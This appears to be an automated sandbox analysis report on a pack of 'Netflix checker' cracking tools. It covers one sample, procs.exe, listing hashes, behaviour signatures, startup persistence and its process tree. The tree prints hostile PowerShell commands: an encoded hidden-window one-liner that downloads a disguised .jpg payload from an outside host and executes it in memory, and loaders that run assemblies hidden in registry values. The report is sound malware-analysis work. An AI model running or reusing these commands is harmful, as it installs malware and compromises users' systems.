Overview
overview
10Static
static
3Netflix To...er.exe
windows10-2004-x64
8Netflix To...er.exe
windows10-2004-x64
7Netflix To...ys.exe
windows10-2004-x64
8Netflix To...ER.exe
windows10-2004-x64
7Netflix To...er.exe
windows10-2004-x64
7Netflix To...rv.exe
windows10-2004-x64
1Netflix To...v2.exe
windows10-2004-x64
7Netflix To...er.exe
windows10-2004-x64
7Netflix To...ck.exe
windows10-2004-x64
1Netflix To...er.exe
windows10-2004-x64
1Netflix To...ky.exe
windows10-2004-x64
7Netflix To...er.exe
windows10-2004-x64
7Netflix To...db.exe
windows10-2004-x64
1Netflix To...ka.exe
windows10-2004-x64
10Netflix To...er.exe
windows10-2004-x64
7Netflix To...cs.exe
windows10-2004-x64
10Netflix To...V3.exe
windows10-2004-x64
10Netflix To...er.exe
windows10-2004-x64
7Netflix To....0.exe
windows10-2004-x64
10Netflix To...ct.exe
windows10-2004-x64
1Netflix To...ix.exe
windows10-2004-x64
7Netflix To...er.exe
windows10-2004-x64
7Netflix To...ar.exe
windows10-2004-x64
7Netflix To...er.exe
windows10-2004-x64
7Netflix To...ar.exe
windows10-2004-x64
1Netflix To...ui.exe
windows10-2004-x64
1Netflix To...GC.exe
windows10-2004-x64
4Netflix To...er.exe
windows10-2004-x64
7Netflix To...to.exe
windows10-2004-x64
7Netflix To...on.exe
windows10-2004-x64
7Netflix To...er.exe
windows10-2004-x64
7Netflix To...ft.exe
windows10-2004-x64
1Analysis
-
max time kernel
28s -
max time network
33s -
platform
windows10-2004_x64 -
resource
win10v2004-20230621-en -
resource tags
arch:x64arch:x86image:win10v2004-20230621-enlocale:en-usos:windows10-2004-x64system -
submitted
23-06-2023 22:56
Static task
static1
Behavioral task
behavioral1
Sample
Netflix Tools PACK/Netflix Tools PACK/GoldFlix GC Netflix Checker/GoldFlix Checker.exe
Resource
win10v2004-20230621-en
Behavioral task
behavioral2
Sample
Netflix Tools PACK/Netflix Tools PACK/GoldFlix GC Netflix Checker/core/Launcher.exe
Resource
win10v2004-20230621-en
Behavioral task
behavioral3
Sample
Netflix Tools PACK/Netflix Tools PACK/GoldFlix GC Netflix Checker/core/gfsys.exe
Resource
win10v2004-20230621-en
Behavioral task
behavioral4
Sample
Netflix Tools PACK/Netflix Tools PACK/HITFLIX CHECKER/HITFLIX CHECKER.exe
Resource
win10v2004-20230621-en
Behavioral task
behavioral5
Sample
Netflix Tools PACK/Netflix Tools PACK/HITFLIX CHECKER/sys/Launcher.exe
Resource
win10v2004-20230621-en
Behavioral task
behavioral6
Sample
Netflix Tools PACK/Netflix Tools PACK/HITFLIX CHECKER/sys/serv.exe
Resource
win10v2004-20230621-en
Behavioral task
behavioral7
Sample
Netflix Tools PACK/Netflix Tools PACK/NetFlix Checker by xRisky v2/NetFlix Checker by xRisky v2.exe
Resource
win10v2004-20230621-en
Behavioral task
behavioral8
Sample
Netflix Tools PACK/Netflix Tools PACK/NetFlix Checker by xRisky v2/debug/Launcher.exe
Resource
win10v2004-20230621-en
Behavioral task
behavioral9
Sample
Netflix Tools PACK/Netflix Tools PACK/NetFlix Checker by xRisky v2/debug/NetCheck.exe
Resource
win10v2004-20230621-en
Behavioral task
behavioral10
Sample
Netflix Tools PACK/Netflix Tools PACK/NetFlix Checker by xRisky v2/debug/chromedriver.exe
Resource
win10v2004-20230621-en
Behavioral task
behavioral11
Sample
Netflix Tools PACK/Netflix Tools PACK/NetFlix GC Checker by xRisky/NetFlix GC Checker by xRisky.exe
Resource
win10v2004-20230621-en
Behavioral task
behavioral12
Sample
Netflix Tools PACK/Netflix Tools PACK/NetFlix GC Checker by xRisky/data/Launcher.exe
Resource
win10v2004-20230621-en
Behavioral task
behavioral13
Sample
Netflix Tools PACK/Netflix Tools PACK/NetFlix GC Checker by xRisky/data/litedb.exe
Resource
win10v2004-20230621-en
Behavioral task
behavioral14
Sample
Netflix Tools PACK/Netflix Tools PACK/Netflix Checker by GOD Cracked By GM`ka/Netflix by GOD Cracked By GM`ka.exe
Resource
win10v2004-20230621-en
Behavioral task
behavioral15
Sample
Netflix Tools PACK/Netflix Tools PACK/Netflix Checker by GOD Cracked By GM`ka/xNet/Launcher.exe
Resource
win10v2004-20230621-en
Behavioral task
behavioral16
Sample
Netflix Tools PACK/Netflix Tools PACK/Netflix Checker by GOD Cracked By GM`ka/xNet/procs.exe
Resource
win10v2004-20230621-en
Behavioral task
behavioral17
Sample
Netflix Tools PACK/Netflix Tools PACK/Netflix Checker Shitter By Team-Otimus V3.0/NetFlix_Shitter_V3.exe
Resource
win10v2004-20230621-en
Behavioral task
behavioral18
Sample
Netflix Tools PACK/Netflix Tools PACK/Netflix Checker Shitter By Team-Otimus V3.0/Team-Otimus V3.0/Launcher.exe
Resource
win10v2004-20230621-en
Behavioral task
behavioral19
Sample
Netflix Tools PACK/Netflix Tools PACK/Netflix Checker Shitter By Team-Otimus V3.0/Team-Otimus V3.0/Shitter 3.0.exe
Resource
win10v2004-20230621-en
Behavioral task
behavioral20
Sample
Netflix Tools PACK/Netflix Tools PACK/Netflix Checker Shitter By Team-Otimus V3.0/Team-Otimus V3.0/ttdinject.exe
Resource
win10v2004-20230621-en
Behavioral task
behavioral21
Sample
Netflix Tools PACK/Netflix Tools PACK/Netflix Checker V3.1 by Cetrix/Netflix Checker V3.1 by Centrix.exe
Resource
win10v2004-20230621-en
Behavioral task
behavioral22
Sample
Netflix Tools PACK/Netflix Tools PACK/Netflix Checker V3.1 by Cetrix/sysdll/Launcher.exe
Resource
win10v2004-20230621-en
Behavioral task
behavioral23
Sample
Netflix Tools PACK/Netflix Tools PACK/Netflix Checker v1 by Sh4lltear/Netflix Checker v1 by Sh4lltear.exe
Resource
win10v2004-20230621-en
Behavioral task
behavioral24
Sample
Netflix Tools PACK/Netflix Tools PACK/Netflix Checker v1 by Sh4lltear/sysdll/Launcher.exe
Resource
win10v2004-20230621-en
Behavioral task
behavioral25
Sample
Netflix Tools PACK/Netflix Tools PACK/Netflix Checker v1 by Sh4lltear/sysdll/Sh4lltear.exe
Resource
win10v2004-20230621-en
Behavioral task
behavioral26
Sample
Netflix Tools PACK/Netflix Tools PACK/Netflix Checker v1 by Sh4lltear/sysdll/wscadminui.exe
Resource
win10v2004-20230621-en
Behavioral task
behavioral27
Sample
Netflix Tools PACK/Netflix Tools PACK/Netflix GC Generator By SpaceXVIII/Gen/GC.exe
Resource
win10v2004-20230621-en
Behavioral task
behavioral28
Sample
Netflix Tools PACK/Netflix Tools PACK/Netflix GC Generator By SpaceXVIII/Gen/Launcher.exe
Resource
win10v2004-20230621-en
Behavioral task
behavioral29
Sample
Netflix Tools PACK/Netflix Tools PACK/Netflix GC Generator By SpaceXVIII/Netflix GC Cracked.to.exe
Resource
win10v2004-20230621-en
Behavioral task
behavioral30
Sample
Netflix Tools PACK/Netflix Tools PACK/Netflix password changer + capture by RubiconT/Netflix by Rubicon.exe
Resource
win10v2004-20230621-en
Behavioral task
behavioral31
Sample
Netflix Tools PACK/Netflix Tools PACK/Netflix password changer + capture by RubiconT/nsi/Launcher.exe
Resource
win10v2004-20230621-en
Behavioral task
behavioral32
Sample
Netflix Tools PACK/Netflix Tools PACK/Netflix password changer + capture by RubiconT/nsi/RubiconSoft.exe
Resource
win10v2004-20230621-en
General
-
Target
Netflix Tools PACK/Netflix Tools PACK/Netflix Checker by GOD Cracked By GM`ka/xNet/procs.exe
-
Size
1.7MB
-
MD5
98bfaca19a9ae44bb60fbc3e98e54d09
-
SHA1
e2f100fc3eb808fe26cdc26327920293c1272cab
-
SHA256
a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3
-
SHA512
d8b5abdb9692f54a512d53589537bb8b4aa489443ef7ae77aede69d5c1510a32ce2508eeca1ff50898fb2305151c53b9f03449dac9a75b4ea8aa370a324f4fbe
-
SSDEEP
49152:Cl1b5zTZ5YfiyFc7Eno6T2te21ZkWQ5XK9Ey5:CdzxCzfTOe2k5amW
Malware Config
Extracted
https://6.top4top.net/p_13529t6r71.jpg
Signatures
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 16 4692 powershell.exe 18 4692 powershell.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exeWScript.exeWScript.exeprocs.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2890635272-812199704-3564780063-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-2890635272-812199704-3564780063-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-2890635272-812199704-3564780063-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-2890635272-812199704-3564780063-1000\Control Panel\International\Geo\Nation procs.exe -
Drops startup file 2 IoCs
Processes:
WScript.exeWScript.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PoYUIXZO.lnk WScript.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KBnSgEeuZWeY.lnk WScript.exe -
Executes dropped EXE 1 IoCs
Processes:
Checker Netflix.exepid process 1836 Checker Netflix.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
Processes:
procs.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2890635272-812199704-3564780063-1000_Classes\Local Settings procs.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepowershell.exepowershell.exepid process 4692 powershell.exe 4692 powershell.exe 4524 powershell.exe 3748 powershell.exe 3748 powershell.exe 4524 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 4692 powershell.exe Token: SeDebugPrivilege 3748 powershell.exe Token: SeDebugPrivilege 4524 powershell.exe -
Suspicious use of WriteProcessMemory 21 IoCs
Processes:
procs.exeWScript.exeWScript.exeWScript.exedescription pid process target process PID 4136 wrote to memory of 1836 4136 procs.exe Checker Netflix.exe PID 4136 wrote to memory of 1836 4136 procs.exe Checker Netflix.exe PID 4136 wrote to memory of 1836 4136 procs.exe Checker Netflix.exe PID 4136 wrote to memory of 2880 4136 procs.exe WScript.exe PID 4136 wrote to memory of 2880 4136 procs.exe WScript.exe PID 4136 wrote to memory of 2880 4136 procs.exe WScript.exe PID 4136 wrote to memory of 2836 4136 procs.exe WScript.exe PID 4136 wrote to memory of 2836 4136 procs.exe WScript.exe PID 4136 wrote to memory of 2836 4136 procs.exe WScript.exe PID 4136 wrote to memory of 1724 4136 procs.exe WScript.exe PID 4136 wrote to memory of 1724 4136 procs.exe WScript.exe PID 4136 wrote to memory of 1724 4136 procs.exe WScript.exe PID 2836 wrote to memory of 4692 2836 WScript.exe powershell.exe PID 2836 wrote to memory of 4692 2836 WScript.exe powershell.exe PID 2836 wrote to memory of 4692 2836 WScript.exe powershell.exe PID 1724 wrote to memory of 4524 1724 WScript.exe powershell.exe PID 1724 wrote to memory of 4524 1724 WScript.exe powershell.exe PID 1724 wrote to memory of 4524 1724 WScript.exe powershell.exe PID 2880 wrote to memory of 3748 2880 WScript.exe powershell.exe PID 2880 wrote to memory of 3748 2880 WScript.exe powershell.exe PID 2880 wrote to memory of 3748 2880 WScript.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker by GOD Cracked By GM`ka\xNet\procs.exe"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker by GOD Cracked By GM`ka\xNet\procs.exe"1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4136 -
C:\Users\Admin\AppData\Roaming\Checker Netflix.exe"C:\Users\Admin\AppData\Roaming\Checker Netflix.exe"2⤵
- Executes dropped EXE
PID:1836
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\l1l1l.vbs"2⤵
- Checks computer location settings
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:2880 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit [Reflection.Assembly]::'Load'((Get-ItemProperty HKCU:\Software\tsQKDrCBEkat).evTHJP).'EntryPoint'.'Invoke'($Null,$Null)3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3748
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\powershell.js"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2836 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 -enc WwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAGIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8ANgAuAHQAbwBwADQAdABvAHAALgBuAGUAdAAvAHAAXwAxADMANQAyADkAdAA2AHIANwAxAC4AagBwAGcAJwApACkAKQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACQAbgB1AGwAbAApAA==3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4692
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\r1r1.vbs"2⤵
- Checks computer location settings
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:1724 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit [Reflection.Assembly]::'Load'((Get-ItemProperty HKCU:\Software\vLEwUGUT).gukeLLVoun).'EntryPoint'.'Invoke'($Null,$Null)3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4524
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
53KB
MD5eec69f1a7eff9b5f29366da620e7de88
SHA1be3b8ae89646aa781dfeb338ecf1b10a8c0c6060
SHA256ffc642634c4337f759852084b94b5bbbb247285d16408d4bec65f240004af5c2
SHA51270d7184fdd97388eb5eeeab2fb716e96a1a4d3a4339e83e98a9b2ca3621c19d379936a108b49d11da971cc428683835f44fc21c59ffb014e3fb5f19c07aa5061
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1.5MB
MD5068068c3cefb4c8d997271897c3173bb
SHA1d2c22b2c05f2a5c953f9a8a728435b3ba2a9954e
SHA25623d57dd5576d4a2841457ef578455fd1c61c21758a9b325469e57d0c5f88f7b5
SHA5120b8c7c29654505f085de12c7663edc326333a439df37d7f48e61019c885ed0810ba492046eac6b2ca4a2a6c75544ad7347cb54869015980fabd85deefc0e549a
-
Filesize
1.5MB
MD5068068c3cefb4c8d997271897c3173bb
SHA1d2c22b2c05f2a5c953f9a8a728435b3ba2a9954e
SHA25623d57dd5576d4a2841457ef578455fd1c61c21758a9b325469e57d0c5f88f7b5
SHA5120b8c7c29654505f085de12c7663edc326333a439df37d7f48e61019c885ed0810ba492046eac6b2ca4a2a6c75544ad7347cb54869015980fabd85deefc0e549a
-
Filesize
1.5MB
MD5068068c3cefb4c8d997271897c3173bb
SHA1d2c22b2c05f2a5c953f9a8a728435b3ba2a9954e
SHA25623d57dd5576d4a2841457ef578455fd1c61c21758a9b325469e57d0c5f88f7b5
SHA5120b8c7c29654505f085de12c7663edc326333a439df37d7f48e61019c885ed0810ba492046eac6b2ca4a2a6c75544ad7347cb54869015980fabd85deefc0e549a
-
Filesize
129KB
MD5c78f607c916f060d6ee3bf391e303acc
SHA11575998cda060d4a570ba258abc12044601da283
SHA256f1e57d1714f74c6939ee24bb348fa12e925ec7eb380d5a7d0f1d230effb742f4
SHA512cf26b8b381402622df420fa3881630661d08d76660d01be2d695af8ade568a6f5e3b365e4b17bffee5589d936eeaad3f7ebf413f4a2d810d976b66511548875b
-
Filesize
2KB
MD540b65baa1541784dd92f5aa8ae11b0ef
SHA10772c95f56a025704c01389f2d1108a17fb987cf
SHA2569609d3a8ee7d439c54aca9c5aeced07caa4199f116367ecb88b63e9e2e29a699
SHA512fc784babe03c75559314dc15a04386d528e71b003b40349df2a4845576bbc9d2f0898d27fc5b1be8cda9fbf16715822bf0616fa7835e1abefe7ccacc8da3b3d2
-
Filesize
87KB
MD50494f414da149631c3d59861865dad37
SHA1c9fd335759efb52e58acb974af27cdecb35d0f10
SHA256a2effa9551b467c88ccea70024bd13650267752d1d6bcd91a5bd6915d9c47a56
SHA512a86f2532f2ba996dc8421146d918250b1925daf803a470e3bce312f29a4d0b25af51d4abc005ab390650cb0cf6b4024df3c411e6ae4ed03cd51906b54683f333